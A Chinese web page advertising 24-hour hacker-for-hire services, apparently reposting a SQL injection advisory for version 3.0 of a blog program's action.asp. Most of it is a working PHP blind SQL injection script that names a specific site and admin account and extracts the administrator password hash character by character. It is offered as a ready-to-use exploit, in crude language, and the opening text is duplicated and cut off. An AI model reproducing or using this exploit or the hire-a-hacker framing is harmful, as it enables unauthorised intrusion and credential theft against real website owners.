24小时在线黑客接单(24小时接单的黑客企鹅群)

24小时在线黑客接单(24小时接单的黑客圈群)影响版本:3.0  信息来源:零客网安 www.0kee.com  Author:bink  漏洞文件:action.asp  很SB的洞。  第14行  CODE:  strcname=request("cname")  set checkcdb=conn.execute("select * from blo

影响版本:3.0  信息来源:零客网安 www.0kee.com  Author:bink  漏洞文件:action.asp  很SB的洞。  第14行  CODE:  strcname=request("cname")  set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")  强奸出的密码是sha1,突死有彩虹表的人继续强奸吧  直接吊hashkey可以进前台操蛋  变量是双引号包着的,所以工具吊不出。  扔个exp。 好不好使看各位造化鸟。  程序代码  <?php    $url="http://www.pjhome.net"; //注入地址  $var_name="puterjam"; //管理员  $var_key="check_right";  if ($_SESSION["LenI"]){  $LenI=$_SESSION["LenI"];  }else{  $LenI=1;  }  for($i=$LenI;$i<=40;$i++){  if($_SESSION["LenDo"]){  $StaAsc=$_SESSION["LenDo"];  }else{  $StaAsc=31;  }  echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";  for($j=$StaAsc;$j<=127;$j++){  $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';  $var_pagelen=file_get_contents($newurl);  $var_newpagelen=strpos($var_pagelen,$var_key);  if($var_newpagelen == true){  $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);  unset($_SESSION["LenDo"]);  $_SESSION["LenI"]=$i+1;  doReload();  break;  }  if($j == $StaAsc+10){  doReload();  break;  }  }  }  if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }  function doReload(){  ?>    <?php  }  ?> 

  • 发表于 2020-12-09 11:15
  • 阅读 ( 353 )
  • 分类:互联网

0 条评论

请先 登录 后评论
爆哥
爆哥

734 篇文章

你可能感兴趣的文章

相关问题